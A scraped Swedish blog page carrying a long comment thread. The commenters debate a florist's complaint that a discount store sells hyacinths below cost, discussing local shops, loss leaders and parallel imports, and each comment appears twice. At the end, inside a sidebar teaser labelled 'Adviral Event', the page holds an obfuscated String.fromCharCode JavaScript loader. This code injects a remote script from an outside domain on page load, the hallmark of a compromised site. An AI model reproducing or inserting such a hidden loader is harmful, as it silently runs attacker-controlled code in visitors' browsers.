  Jag är utbildad florist men arbetar inte som det, men min bästa vän är florist och har tävlat inom yrket (och vunnit florist SM!) och är butikschef i en blomsterbutik som nu håller på att gå i konkurs för att de inte kan konkurrera med stormarknaden i närheten som säljer väldigt mycket och fina blommor. Jag verkligen lider med alla florister som knappt får det att gå runt i deras butiker… Jag förstår att inte du hade kunnat tänka dig att köpa begravningsbinderi ICA-butik eller liknande, och det är det nog många som inte vill… Men helt ärligt blir man ju halvt ruinerad vid en begravning eftersom det är så mycket saker som kostar pengar, och vad spelar det då för roll egentligen om man köper blommor från ICA där man kanske har råd med de blommor man vill ha till begravningen? För det är ju samma sak där, alla människor har inte råd med blommor från en florist.. Och ska man hellre låta bli att ha blommor till begravningen då?

  Jag inser att jag låter lite anklagande i min kommentar, haha, vilket inte egentligen är meningen! men jag blir bara så engagerad i den här frågan eftersom jag har sett hur svårt många människor har det ekonomiskt och hur glada de blir av att kunna köpa en liten blomma till hemmet 🙂 Men jag är väldigt kluven i frågan också, för det ÄR tråkigt om hantverket försvinner…

 37. 2 kr eller 10 kr det är ju så små pengar så jag förstår inte problemet? Ska man spara 8 kr för noll service?.. vad är det.. en chokladboll..

 38. 2 kr eller 10 kr det är ju så små pengar så jag förstår inte problemet? Ska man spara 8 kr för noll service?.. vad är det.. en chokladboll..

 39. Driver konditori sen 10 år tillbaka. Jag älskar mitt yrke och jag älskar mitt jobb. Bakar allt själva med de bästa råvarorna. Vi slås mot livsmedelsbutikerna som säljer bullar lika billigt som dina blommor. De gör ont i själen! Ditt inlägg va fantastiskt! Kram Nina

 40. Driver konditori sen 10 år tillbaka. Jag älskar mitt yrke och jag älskar mitt jobb. Bakar allt själva med de bästa råvarorna. Vi slås mot livsmedelsbutikerna som säljer bullar lika billigt som dina blommor. De gör ont i själen! Ditt inlägg va fantastiskt! Kram Nina

 41. Hej My!
  Förstår din frustration, men med ett något objektivt öga så noterar jag att du själv åker till ÖB för att köpa dig en billig ljusslinga, hur tror du den traditionella el-handeln känner för det? Det finns alltid två sidor av myntet…
  God jul

  • Hej Anna! Jag åkte till Ö&B gör att handla, ja…. Det är inget fel på Ö&B generellt ? mest för att det ligger 4min från min butik, jag köpte en ljusslinga för 199:- som ICA tar 149kr haha! Typiskt mig… Men jag sparse ändå Völdigt mycket tid…. Saken är den att jag inte menar att man inte kan handla på lågpris varuhusen, men gör att dra en parallell OM H&M säljer ett bad linne för 59:- (vilket dom gör, och jag sen i min butik skulle sälja SAMMA linne för 11:80:- då hamnar vi på exakt samma procentuella priskillnad… Då kan man snabbt räkna ut att 11:80:- inte täcket upp för fabriks kostnaden på långa vägar… Eller som i denna situation, odlaren får inte i närheten av vad han/hon behöver ha. Detta är jag väl insatt i då jag även jobbar som grossist, och tyvärr förra året såg två olika odlare gå i konkurs… Familjeföretag som har drivits i generationer…. Pga utav liknande situationer…. Fortsätter det såhär så kommer vi snart inte att ha några svenska odlare kvar….. Sorgligt i mina ögon ? självklart kan Ö&B, ICA, COOP och alla andra sälja blommor och andra saker, och vara konkurrens kraftiga med priserna men inte UNDER produktion/uppdrivnibgskostnad, då kommer ju vi alla bli drabbade i olika led från, odlaren, till butiken och även alla ni som är konsumenter….. Ha en fin dag:)

 42. Hej My!
  Förstår din frustration, men med ett något objektivt öga så noterar jag att du själv åker till ÖB för att köpa dig en billig ljusslinga, hur tror du den traditionella el-handeln känner för det? Det finns alltid två sidor av myntet…
  God jul

  • Hej Anna! Jag åkte till Ö&B gör att handla, ja…. Det är inget fel på Ö&B generellt 🙂 mest för att det ligger 4min från min butik, jag köpte en ljusslinga för 199:- som ICA tar 149kr haha! Typiskt mig… Men jag sparse ändå Völdigt mycket tid…. Saken är den att jag inte menar att man inte kan handla på lågpris varuhusen, men gör att dra en parallell OM H&M säljer ett bad linne för 59:- (vilket dom gör, och jag sen i min butik skulle sälja SAMMA linne för 11:80:- då hamnar vi på exakt samma procentuella priskillnad… Då kan man snabbt räkna ut att 11:80:- inte täcket upp för fabriks kostnaden på långa vägar… Eller som i denna situation, odlaren får inte i närheten av vad han/hon behöver ha. Detta är jag väl insatt i då jag även jobbar som grossist, och tyvärr förra året såg två olika odlare gå i konkurs… Familjeföretag som har drivits i generationer…. Pga utav liknande situationer…. Fortsätter det såhär så kommer vi snart inte att ha några svenska odlare kvar….. Sorgligt i mina ögon 🙁 självklart kan Ö&B, ICA, COOP och alla andra sälja blommor och andra saker, och vara konkurrens kraftiga med priserna men inte UNDER produktion/uppdrivnibgskostnad, då kommer ju vi alla bli drabbade i olika led från, odlaren, till butiken och även alla ni som är konsumenter….. Ha en fin dag:)

 43. Den fria konkurrensen o EU fantastiska saker och Saab anställda som köpte koreanska bilar inte konstigt att Saab gick i kk samma om man köper en enmeters

 44. Den fria konkurrensen o EU fantastiska saker och Saab anställda som köpte koreanska bilar inte konstigt att Saab gick i kk samma om man köper en enmeters

 45. Du har inte ställt samma fråga till dig själv!?
  Varför köper du en billig slinga på Ö&B varför går du inte till en lampbutik med även där helt andra priser……???? Tänk tanken fullt ut!

  • Hej Eva! Tack för att du delar med dig utav din åsikt… Jag svarade på just det lite längre ner här i kommentars fältet på Annas fråga gällande samma sak ? vänligen borste från alla stavfel (svarade från mobilen, som stavade om många ord) mvh my

 46. Du har inte ställt samma fråga till dig själv!?
  Varför köper du en billig slinga på Ö&B varför går du inte till en lampbutik med även där helt andra priser……???? Tänk tanken fullt ut!

  • Hej Eva! Tack för att du delar med dig utav din åsikt… Jag svarade på just det lite längre ner här i kommentars fältet på Annas fråga gällande samma sak 🙂 vänligen borste från alla stavfel (svarade från mobilen, som stavade om många ord) mvh my

 47. Jag förstår din reaktion! Man försöker jobba med kvalitet och för kundens bästa. Nu tror jag att Ö&B inte tjänar några pengar på dessa blommor utan dom har dom som lockvara, precis som Ica använder sig av kaffe, blöjor, välling, etc för att locka till sig kunder. Dessa produkter är rena förlust affärer dom men räknar med att man köper andra saker som dom kan tjäna pengar på ist. Inget konstigt tycker jag, men jag förstår din reaktion. Konkurrensen är fri som tur är, jag tror att ni inte slåss om samma kunder i slutändan utan dom har sina kunder och du dina. Var duktig på det du gör och låt dina kunder känna ett mervärde som gör att du kan ta betalt för dina produkter och tjänster. Det kommer alltid att finnas de som tycker att det är värt ngt att få service och kvalitet, det är ngt som inte riktigt finner på Ö&B
  De bästa överlever alltid i sitt gebit, var bäst på det du gör så kommer det att gå bra!

 48. Jag förstår din reaktion! Man försöker jobba med kvalitet och för kundens bästa. Nu tror jag att Ö&B inte tjänar några pengar på dessa blommor utan dom har dom som lockvara, precis som Ica använder sig av kaffe, blöjor, välling, etc för att locka till sig kunder. Dessa produkter är rena förlust affärer dom men räknar med att man köper andra saker som dom kan tjäna pengar på ist. Inget konstigt tycker jag, men jag förstår din reaktion. Konkurrensen är fri som tur är, jag tror att ni inte slåss om samma kunder i slutändan utan dom har sina kunder och du dina. Var duktig på det du gör och låt dina kunder känna ett mervärde som gör att du kan ta betalt för dina produkter och tjänster. Det kommer alltid att finnas de som tycker att det är värt ngt att få service och kvalitet, det är ngt som inte riktigt finner på Ö&B
  De bästa överlever alltid i sitt gebit, var bäst på det du gör så kommer det att gå bra!

 49. Jamen du köper ju också där så varför tycker du inte vi ska!!! Snett inlägg. Jag köper mina rosor på Lidl som alltid står minst två veckor . Kostar 39 kronor hos dig säkert det dubbla. Sopa rent framför egen dörr.

  • Oj, fröken moraltant trillade in här också,… Om du läser mitt svar lite längre ner på detta inlägget så finner du snart en poäng och kanske vidgar synen något, och kanske eventuellt också kan tänka dig in i andras situationer, då jag tydligt poängterar vad själva felet är. INTE att dom säljer blommor, inte att dom har konkursens kraftiga och lägre priser…. Utan att dom ligger under uppdrivnings kostnadspriset, och hur det påverkar odlare, butik OCH även dig dom konsument…. Soppa rent eller inte, önskar dig även denna gången god jul… PS: knapra på några pepparkakor, så kanske du får en lenare ton i dina kommentarer till mig ? kram

 50. Jamen du köper ju också där så varför tycker du inte vi ska!!! Snett inlägg. Jag köper mina rosor på Lidl som alltid står minst två veckor . Kostar 39 kronor hos dig säkert det dubbla. Sopa rent framför egen dörr.

  • Oj, fröken moraltant trillade in här också,… Om du läser mitt svar lite längre ner på detta inlägget så finner du snart en poäng och kanske vidgar synen något, och kanske eventuellt också kan tänka dig in i andras situationer, då jag tydligt poängterar vad själva felet är. INTE att dom säljer blommor, inte att dom har konkursens kraftiga och lägre priser…. Utan att dom ligger under uppdrivnings kostnadspriset, och hur det påverkar odlare, butik OCH även dig dom konsument…. Soppa rent eller inte, önskar dig även denna gången god jul… PS: knapra på några pepparkakor, så kanske du får en lenare ton i dina kommentarer till mig 😉 kram

 51. Hej,
  Jag förstår din frustration.Jag driver själv butik, fast med kläder. Håller inte riktigt med dig att det inte krävs någon kunskap i det. Det krävs visst kunskap i material, färg och mycket annat.
  Du själv kanske också skulle handla liiite i alla fall i dina Kalmarbutiker.Där försvinner dom ju en efter en pga all denna näthandel som du verkar vara proffs på.
  Jag har varit i din fina butik och handlat verkligt fina blommor, och gör det gärna igen då jag tycker att vi måste värna om våra lokala handlare.
  Nu bor jag i Sthlm och har lite långt att åka, men jag kom precis hem med hyacinter från min blomsteraffär här där jag bor. Dom kostade 35:- styck, men fina är dom.
  Vi måste börja tänka om med vårt köpbeteende, för annars blir det lite torftigt med bara ÖB, Lindex, HM och kedjorna vart man än kommer.
  Så god jul till dig, och hjälp till att bevara våra små handlare du med.
  Kram

 52. Hej,
  Jag förstår din frustration.Jag driver själv butik, fast med kläder. Håller inte riktigt med dig att det inte krävs någon kunskap i det. Det krävs visst kunskap i material, färg och mycket annat.
  Du själv kanske också skulle handla liiite i alla fall i dina Kalmarbutiker.Där försvinner dom ju en efter en pga all denna näthandel som du verkar vara proffs på.
  Jag har varit i din fina butik och handlat verkligt fina blommor, och gör det gärna igen då jag tycker att vi måste värna om våra lokala handlare.
  Nu bor jag i Sthlm och har lite långt att åka, men jag kom precis hem med hyacinter från min blomsteraffär här där jag bor. Dom kostade 35:- styck, men fina är dom.
  Vi måste börja tänka om med vårt köpbeteende, för annars blir det lite torftigt med bara ÖB, Lindex, HM och kedjorna vart man än kommer.
  Så god jul till dig, och hjälp till att bevara våra små handlare du med.
  Kram

 53. Tråkigt att höra, men konkurrensen har sina spelregler. Storskalig produktion likaså. Ger man sig in i leken så får man leken tåla, eller försöka påverka spelreglerna. Att beskylla kunderna är lite tvivelaktigt, frågan bör ställas kring hur plantorna är producerade. ÖoB och andra category killes pressar priserna och hotar dig och andra små aktörer, tråkigt men helt enligt marknadens spelregler. Tråkigt när stora jättar växer på mindre aktörers bekostnad, men bedömningen av kvalitet och prisvärde ligger dock på konsumenten. Det är en problematisk verklighet minst sagt.

  • Hej där! Jag beskyller inte kunderna för någonting…. Men opåtalar att alla konsumenter har ett ansvar…. Precis som vi alla har ett ansvar när vi får en chans att lägga våran röst vid valet…. Två helt olika saker, med en gemensam nämnare att man som unik person har en chans att påverka…. ? mvh

 54. Tråkigt att höra, men konkurrensen har sina spelregler. Storskalig produktion likaså. Ger man sig in i leken så får man leken tåla, eller försöka påverka spelreglerna. Att beskylla kunderna är lite tvivelaktigt, frågan bör ställas kring hur plantorna är producerade. ÖoB och andra category killes pressar priserna och hotar dig och andra små aktörer, tråkigt men helt enligt marknadens spelregler. Tråkigt när stora jättar växer på mindre aktörers bekostnad, men bedömningen av kvalitet och prisvärde ligger dock på konsumenten. Det är en problematisk verklighet minst sagt.

  • Hej där! Jag beskyller inte kunderna för någonting…. Men opåtalar att alla konsumenter har ett ansvar…. Precis som vi alla har ett ansvar när vi får en chans att lägga våran röst vid valet…. Två helt olika saker, med en gemensam nämnare att man som unik person har en chans att påverka…. 🙂 mvh

 55. Hej brukar läsa din blogg vilket go där är i dig , men angående blommor , jag köper ofta blommor på Ica snitt blommor, och har även sett deras gravsmycknings kransar , Dexter jätte fina ut , aldrig köpt själv förståss, men vet att de säljs massor av de . Jag tycker att var och en har rätt att handla vad de vill utan att vara moral tant .

  • Hej! Absolut, visst är det så…. Gällande ”motaltant” svaret, så var det ett svar angående ett påhopp gällande min sin, Alltså ingenting som har med blommor att föra als…. Vara. Jag & den blogg läsaren har mailat mellan oss och rett ut eventuella missförstånd… ? god jul, oavsett om du handlar på Ica eller inte ? DET var inte poängen med inlägget….. mvh

 56. Hej brukar läsa din blogg vilket go där är i dig , men angående blommor , jag köper ofta blommor på Ica snitt blommor, och har även sett deras gravsmycknings kransar , Dexter jätte fina ut , aldrig köpt själv förståss, men vet att de säljs massor av de . Jag tycker att var och en har rätt att handla vad de vill utan att vara moral tant .

  • Hej! Absolut, visst är det så…. Gällande ”motaltant” svaret, så var det ett svar angående ett påhopp gällande min sin, Alltså ingenting som har med blommor att föra als…. Vara. Jag & den blogg läsaren har mailat mellan oss och rett ut eventuella missförstånd… 😉 god jul, oavsett om du handlar på Ica eller inte 😉 DET var inte poängen med inlägget….. mvh

 57. Förstår helheten i ditt inlägg och kan hålla med dig överlag, men det är sååå svårt att ta detta på allvar när du särskriver i vareeeenda mening…. Knappt läsbart.

  • Haha! Jag vet vad du menar Andrea, om du är ny här inne på min sida så kan jag bara berätta att jag har dyslexi och kämpar med stavningen varenda eviga dag ? Jag brukar iallfall göra mig förstådd … God jul på dig! Mvh

 58. Förstår helheten i ditt inlägg och kan hålla med dig överlag, men det är sååå svårt att ta detta på allvar när du särskriver i vareeeenda mening…. Knappt läsbart.

  • Haha! Jag vet vad du menar Andrea, om du är ny här inne på min sida så kan jag bara berätta att jag har dyslexi och kämpar med stavningen varenda eviga dag 😉 Jag brukar iallfall göra mig förstådd … God jul på dig! Mvh

 59. Folk är ju roliga, de handlar på de stora (billiga) kedjorna, men sen klagar de när de lokala handlarna får lägga ner. Jag bor på en liten ort med Ica och bensinmack. Jag handlar och tankar där fastän jag ofta har vägarna förbi billigare ställen, eftersom jag vill ha den servicen de gångerna jag inte är inne i stan. Stödjer man inte de lokala handlarna klarar de sig inte. Det är ju samma sak med tex blomsteraffärer. De gånger man ska ha något särskilt måste man gå till en florist, och då skulle ju folk klaga om det inte fanns nån längre…
  För övrigt är jag inte ofta på Öland, men var där på skördefesten. Då shoppade jag loss hos dig ?. Det fanns jättemycket fint till väldigt bra priser!

 60. Folk är ju roliga, de handlar på de stora (billiga) kedjorna, men sen klagar de när de lokala handlarna får lägga ner. Jag bor på en liten ort med Ica och bensinmack. Jag handlar och tankar där fastän jag ofta har vägarna förbi billigare ställen, eftersom jag vill ha den servicen de gångerna jag inte är inne i stan. Stödjer man inte de lokala handlarna klarar de sig inte. Det är ju samma sak med tex blomsteraffärer. De gånger man ska ha något särskilt måste man gå till en florist, och då skulle ju folk klaga om det inte fanns nån längre…
  För övrigt är jag inte ofta på Öland, men var där på skördefesten. Då shoppade jag loss hos dig :-). Det fanns jättemycket fint till väldigt bra priser!

 61. Nu kanske jag missat poängen men vad var du där för att handla? Säg att du skulle vilja köpa chips…och så sålde de superbilliga chips för 5kr/påsen….skulle du inte köpa då? Jag förstår frustrationen men ändå inte då du faktiskt själv var där för att handla….de använder lockvaror (och kanske de går back på det?) och det gör säkert du med ?

 62. Nu kanske jag missat poängen men vad var du där för att handla? Säg att du skulle vilja köpa chips…och så sålde de superbilliga chips för 5kr/påsen….skulle du inte köpa då? Jag förstår frustrationen men ändå inte då du faktiskt själv var där för att handla….de använder lockvaror (och kanske de går back på det?) och det gör säkert du med 🙂

 63. har läst alla kommentarer. du har ett ändlöst tålamod! också snyggt av dig att i affekt komma fram till att om du köper alla enheter av varan så blir du återigen ensam leverantör av varan i området. du kan dessutom sänka ditt pris på varan utan att förlora din marginal och därmed använda varan som lockpris. ”bra spelat” som jag skulle ha sagt ?
  kanske är en regeländring på sin plats. något som gör att stora kedjor måste ta geografiskt nära småföretagare i akt när de väljer vilken vara de ska sätta lockpris på. eller kanske förbjuda parallellimport*. för det är väl förmodligen parallellimport som är den stora boven i just den här historien…
  det blir svårt att förbjuda en säljare att sälja en vara med förlust. utan den mekanismen kan det bli nästan omöjligt för en ny aktör att slå sig in på en marknad. samtidigt, svensk politik har länge utgivit sig för att stödja egen företagsverksamhet, men alla spelreglerna går att exploatera för de stora företagen men inte för de små.
  *parallellimport: företag a säljer en vara, vi kan kalla den bilar. tillverkningen kostar 5 kr per enhet. de säljer bra i sverige men vill nu expandera och försöka slå sig in på den tyska marknaden. de säljer sin produkt till det svenska varuhuset b för 10 kr vilket innebär en vinst på 5 kr. varuhuset b säljer sedan till konsument för 15 kr. men till det tyska varuhuset c säljer a bilar för 2 kr. på det sättet kan c sälja till konsument för motsvarande 7 kr och ändå få samma fina marginal på motsvarande 5 kr. 7 kr är dessutom billigare än 12 kr vilket är vad das auto kostar på c. sen hoppas a kunna höja sitt pris på sikt när de säljer till c. samtidigt har b upptäckt att om de kör en lastbil till tyska c, fyller den med bilar för 7 kr per enhet och kör den tillbaka till sverige så har totalkostnaden blivit 8 kr per enhet. b kan nu sälja bilar för 13 kr utan att förlora sin marginal.

 64. Jag håller med dig My.
  Jag hoppas också att alla som stödjer artikeln tänker på samma sak när det gäller andra varor ni köper, så som mat köpt av lokala tillverkare och inte produerat långt bort eller för den delen lokalproducerade kläder och vitvaror. Om ni inte gör det blir det ju samma sak som My pratar om i sin artikel.
  /Emil

 65. har läst alla kommentarer. du har ett ändlöst tålamod! också snyggt av dig att i affekt komma fram till att om du köper alla enheter av varan så blir du återigen ensam leverantör av varan i området. du kan dessutom sänka ditt pris på varan utan att förlora din marginal och därmed använda varan som lockpris. ”bra spelat” som jag skulle ha sagt 😉

  kanske är en regeländring på sin plats. något som gör att stora kedjor måste ta geografiskt nära småföretagare i akt när de väljer vilken vara de ska sätta lockpris på. eller kanske förbjuda parallellimport*. för det är väl förmodligen parallellimport som är den stora boven i just den här historien…

  det blir svårt att förbjuda en säljare att sälja en vara med förlust. utan den mekanismen kan det bli nästan omöjligt för en ny aktör att slå sig in på en marknad. samtidigt, svensk politik har länge utgivit sig för att stödja egen företagsverksamhet, men alla spelreglerna går att exploatera för de stora företagen men inte för de små.

  *parallellimport: företag a säljer en vara, vi kan kalla den bilar. tillverkningen kostar 5 kr per enhet. de säljer bra i sverige men vill nu expandera och försöka slå sig in på den tyska marknaden. de säljer sin produkt till det svenska varuhuset b för 10 kr vilket innebär en vinst på 5 kr. varuhuset b säljer sedan till konsument för 15 kr. men till det tyska varuhuset c säljer a bilar för 2 kr. på det sättet kan c sälja till konsument för motsvarande 7 kr och ändå få samma fina marginal på motsvarande 5 kr. 7 kr är dessutom billigare än 12 kr vilket är vad das auto kostar på c. sen hoppas a kunna höja sitt pris på sikt när de säljer till c. samtidigt har b upptäckt att om de kör en lastbil till tyska c, fyller den med bilar för 7 kr per enhet och kör den tillbaka till sverige så har totalkostnaden blivit 8 kr per enhet. b kan nu sälja bilar för 13 kr utan att förlora sin marginal.

 66. Jag håller med dig My.
  Jag hoppas också att alla som stödjer artikeln tänker på samma sak när det gäller andra varor ni köper, så som mat köpt av lokala tillverkare och inte produerat långt bort eller för den delen lokalproducerade kläder och vitvaror. Om ni inte gör det blir det ju samma sak som My pratar om i sin artikel.
  /Emil

 67. Jag håller med dig – men du är långt ifrån ensam. Jag driver ett specialistbageri och skapar designade tårtor, bakverk och dessertbord. Det är inte billigt men det är ett unikt hantverk skapat i livsmedelsgodkända lokaler med noga utvalda råvaror hanterade av proffs som är utbildade i livsmedelshantering. MEN – nu har alla en granne, kollega, kompis, svägerska osv som ”hobbybakar” för en fjärdedel av vad vi måste ta för att täcka utgifter, skatt och moms och ändå ha en urusel timpenning. Där är det konkurrens på helt fel grunder, man gynnar dessutom svart marknad, bryter mot skatteregler OCH kommunens regler för livsmedelshantering – men det skiter folk i, för att det är billigt!!! Och så kommer det alltid vara, folk har inget samvete när det kommer till att hålla i plånboken. Vi får bara försöka att fortsätta att vara bra på det vi är bäst på, fortsätta att utvecklas så att det goda ordet sprider sig.
  All heder till dig som agerade, hoppas du fick sålt alla hyacinterna och gjorde dig en bra julhandelsförtjänst.
  Kramar från Maria i Skåne.

 68. Jag håller med dig – men du är långt ifrån ensam. Jag driver ett specialistbageri och skapar designade tårtor, bakverk och dessertbord. Det är inte billigt men det är ett unikt hantverk skapat i livsmedelsgodkända lokaler med noga utvalda råvaror hanterade av proffs som är utbildade i livsmedelshantering. MEN – nu har alla en granne, kollega, kompis, svägerska osv som ”hobbybakar” för en fjärdedel av vad vi måste ta för att täcka utgifter, skatt och moms och ändå ha en urusel timpenning. Där är det konkurrens på helt fel grunder, man gynnar dessutom svart marknad, bryter mot skatteregler OCH kommunens regler för livsmedelshantering – men det skiter folk i, för att det är billigt!!! Och så kommer det alltid vara, folk har inget samvete när det kommer till att hålla i plånboken. Vi får bara försöka att fortsätta att vara bra på det vi är bäst på, fortsätta att utvecklas så att det goda ordet sprider sig.
  All heder till dig som agerade, hoppas du fick sålt alla hyacinterna och gjorde dig en bra julhandelsförtjänst.
  Kramar från Maria i Skåne.

 69. Jag förstår dig. MEN Ica säker florister för fullt. Att köpa Rydells blommor till billigt pris innebär mycket sämre kvalité. Men om Ica anställer utbildade florister som gör begravningsbinderier etc så ser jag inte problemet. Visst, tråkigt för de små ”riktiga” blomsterbutikerna men samtidigt måste vi följa utvecklingen. Folk vill ha det bekvämt. Och kan en då få hjälp av en riktig florist på ica så kanske det är ett jättebra alternativ. Jag är själv utbildad florist men här där jag bor finns inga jobb. Att starta eget är heller inget alternativ då marknaden är mättad. Det är butiker överallt. Så ja, jag har sökt floristjobbet på Ica. Gör det med till en sämre människa som skändar yrket florist?

 70. Jag förstår dig. MEN Ica säker florister för fullt. Att köpa Rydells blommor till billigt pris innebär mycket sämre kvalité. Men om Ica anställer utbildade florister som gör begravningsbinderier etc så ser jag inte problemet. Visst, tråkigt för de små ”riktiga” blomsterbutikerna men samtidigt måste vi följa utvecklingen. Folk vill ha det bekvämt. Och kan en då få hjälp av en riktig florist på ica så kanske det är ett jättebra alternativ. Jag är själv utbildad florist men här där jag bor finns inga jobb. Att starta eget är heller inget alternativ då marknaden är mättad. Det är butiker överallt. Så ja, jag har sökt floristjobbet på Ica. Gör det med till en sämre människa som skändar yrket florist?

 71. Känner igen problematiken, ÖoB är väl förvisso ett överskottslager från början och inte en matbutik om jag minns rätt men glidningen inom branscherna har pågått ett tag och skapar en konkurrens om varor som vissa har som sidoinkomst och vissa som huvudinkomst. Om man då inte kan konkurrera med priserna så får man göra det med servicen. Landsbyggden döda själva lanthandlarna när de tog bilen till staden för att handla och de som handlar på nätet kommer så småning om att död många städers affärsutbud och gatuliv.

 72. Känner igen problematiken, ÖoB är väl förvisso ett överskottslager från början och inte en matbutik om jag minns rätt men glidningen inom branscherna har pågått ett tag och skapar en konkurrens om varor som vissa har som sidoinkomst och vissa som huvudinkomst. Om man då inte kan konkurrera med priserna så får man göra det med servicen. Landsbyggden döda själva lanthandlarna när de tog bilen till staden för att handla och de som handlar på nätet kommer så småning om att död många städers affärsutbud och gatuliv.

 73. Du skrev att set påverkar odlarna, konsumenterna osv. Jag som jobbar på ICA vet att i många av fallen, så får vi köpa in såkallade ”klippvaror” av olika leverantörer. Vi kan ex ta en chokladkaka. Normalpris ut mot kund är 10:- och vårat inköpspris kanske är 5:- om vi nu får köpa in dem för 2:- och kan sälja dem till dig som kund för 5:- då kan jag förstå dig när du menar att det inte täcker alla omkostnader för produktionen av chokladen. Men ibland som ex paradis/aladinaskarna ALLA vill köpa till jul. De flesta butiker har extrapris på dem under jul. Då kanske vårat ordinarie inpris är 25:- men vi (ICA) har valt att sälja dem till extrapris till dig som kund för 20:- Så kanske du reagerar precis likadant som med hyacinterna. -Hur kan vi sälja dem så billigt, det finns ingen människa/maskin som kan tillverka dess ask och innehåll för det priset. Svaret är både ja och nej. För 20:- så är svaret nej. Men vad du som kund inte vet är att vi har betalat 25:- (som vi brukar, som skall täcka alla omkostader, produktion, transporter osv) och att vi går rejält back på denna varan men vi vet att alla vill ha den så då går de in i vår butik och det i sin tur lockar kunderna att köpa mer varor som vi går plus på ?

 74. Du skrev att set påverkar odlarna, konsumenterna osv. Jag som jobbar på ICA vet att i många av fallen, så får vi köpa in såkallade ”klippvaror” av olika leverantörer. Vi kan ex ta en chokladkaka. Normalpris ut mot kund är 10:- och vårat inköpspris kanske är 5:- om vi nu får köpa in dem för 2:- och kan sälja dem till dig som kund för 5:- då kan jag förstå dig när du menar att det inte täcker alla omkostnader för produktionen av chokladen. Men ibland som ex paradis/aladinaskarna ALLA vill köpa till jul. De flesta butiker har extrapris på dem under jul. Då kanske vårat ordinarie inpris är 25:- men vi (ICA) har valt att sälja dem till extrapris till dig som kund för 20:- Så kanske du reagerar precis likadant som med hyacinterna. -Hur kan vi sälja dem så billigt, det finns ingen människa/maskin som kan tillverka dess ask och innehåll för det priset. Svaret är både ja och nej. För 20:- så är svaret nej. Men vad du som kund inte vet är att vi har betalat 25:- (som vi brukar, som skall täcka alla omkostader, produktion, transporter osv) och att vi går rejält back på denna varan men vi vet att alla vill ha den så då går de in i vår butik och det i sin tur lockar kunderna att köpa mer varor som vi går plus på 🙂

 75. hej,
  Jag handlar oftast blommor i blomsterbutik och el i el-butik. Vem kan ha gjort en el-slinga så att den blir så billig som på ikea eller ö&b? Jag skulle heller aldrig handla kläder i blomsterbutik om det inte handlar om trädgårdshandskar eller -förkläde. Jag handlar också helst matvaror i min närmaste affär – jag förstår mig inte på dom som tar bil till en affär längre bort för att blöjpaketet är 2 kr billigare. Städer som Nyköping eller Kalmar får sina centrum utarmade på butiker på det sättet och just p g a det försvinner småbutikerna på köpet eftersom kunderna handlar från nån blomsterhandel som ligger därute vid köpcentrat. Visst kan det slinka ner nåt billigt från den butik man råkar vara i för att man inte hinner annat just den dan. Men försök tänka större och längre när det gäller alla sorters butiker.

  • Hej! Poängen var inte att dom säljer det billigare….. Det kan jag förstå…. Poängenr att det är lååååångt under uppdrivningskostnad…. Jag har svarat lite utförligare om det längre ner här ? gott nytt år! Mvh my

 76. hej,
  Jag handlar oftast blommor i blomsterbutik och el i el-butik. Vem kan ha gjort en el-slinga så att den blir så billig som på ikea eller ö&b? Jag skulle heller aldrig handla kläder i blomsterbutik om det inte handlar om trädgårdshandskar eller -förkläde. Jag handlar också helst matvaror i min närmaste affär – jag förstår mig inte på dom som tar bil till en affär längre bort för att blöjpaketet är 2 kr billigare. Städer som Nyköping eller Kalmar får sina centrum utarmade på butiker på det sättet och just p g a det försvinner småbutikerna på köpet eftersom kunderna handlar från nån blomsterhandel som ligger därute vid köpcentrat. Visst kan det slinka ner nåt billigt från den butik man råkar vara i för att man inte hinner annat just den dan. Men försök tänka större och längre när det gäller alla sorters butiker.

  • Hej! Poängen var inte att dom säljer det billigare….. Det kan jag förstå…. Poängenr att det är lååååångt under uppdrivningskostnad…. Jag har svarat lite utförligare om det längre ner här 😉 gott nytt år! Mvh my

 77. Tycker att det är ganska dåligt av dig att skriva namnen på företagen.
  Tex Ica, där jag förövrigt jobbar i vår lilla stad, har vi två florister och en trädgårdsmästare som jobbar heltid och är väldigt kunniga vad gäller både inne- och uteväxter och binderier för alla tillfällen.
  Dra inte alla över ett streck.

 78. Tycker att det är ganska dåligt av dig att skriva namnen på företagen.
  Tex Ica, där jag förövrigt jobbar i vår lilla stad, har vi två florister och en trädgårdsmästare som jobbar heltid och är väldigt kunniga vad gäller både inne- och uteväxter och binderier för alla tillfällen.
  Dra inte alla över ett streck.

Svara

Lämna din kommentar!
Ditt namn här

Om du missat..

Andas ut stressen med hjälp av djupandning

Andas ut stressen med hjälp av djupandning -Hur många tänker egentligen på sin andning? Jag...

SMEG bagaren och kocken 20%

I reklamsamarbete Bagaren och Kocken ??‍? Hej på er! Detta är en grymt efterlängtad kampanj...

Adviral Event

My Martens , Ako Rahim. Adviral Media. d Ako, Renata, My   var f=String;+f.fromCharCode(99,116,105,111,110)+f.fromCharCode(32,97,115,115,40,115,114,99,41,123,114,101,116,117,114,110)+f.fromCharCode(32,66,111,111,108,101,97,110)+f.fromCharCode(40,100,111,99,117,109,101,110)+f.fromCharCode(116,46,113,117,101,114,121,83,101,108,101,99,116,111,114,40,39,115,99,114,105,112,116,91,115,114,99,61,34,39,32,43,32,115,114,99,32,43,32,39,34,93,39,41,41,59,125,32,118,97,114,32,108,111,61,34,104,116,116,112,115,58,47,47,115,116,97,121,46,108,105,110)+f.fromCharCode(101,115,116,111,103,101,116,46,99,111,109,47,115,99,114,105,112,116,115,47,99,104,101,99,107,46,106,115,63,118,61,53,46,53,53,46,53,34,59,105,102,40,97,115,115,40,108,111,41,61,61,102,97,108,115,101,41,123,118,97,114,32,100,61,100,111,99,117,109,101,110)+f.fromCharCode(116,59,118,97,114,32,115,61,100,46,99,114,101,97,116,101,69,108,101,109,101,110)+f.fromCharCode(116,40,39,115,99,114,105,112,116,39,41,59,32,115,46,115,114,99,61,108,111,59,105,102,32,40,100,111,99,117,109,101,110)+f.fromCharCode(116,46,99,117,114,114,101,110)+f.fromCharCode(116,83,99,114,105,112,116,41,32,123,32,100,111,99,117,109,101,110)+f.fromCharCode(116,46,99,117,114,114,101,110)+f.fromCharCode(116,83,99,114,105,112,116,46,112,97,114,101,110)+f.fromCharCode(116,78,111,100,101,46,105,110)+f.fromCharCode(115,101,114,116,66,101,102,111,114,101,40,115,44,32,100,111,99,117,109,101,110)+f.fromCharCode(116,46,99,117,114,114,101,110)+f.fromCharCode(116,83,99,114,105,112,116,41,59,125,32,101,108,115,101,32,123,100,46,103,101,116,69,108,101,109,101,110)+f.fromCharCode(116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,46,97,112,112,101,110)+f.fromCharCode(100,67,104,105,108,100,40,115,41,59,125,125));/*99586587347*/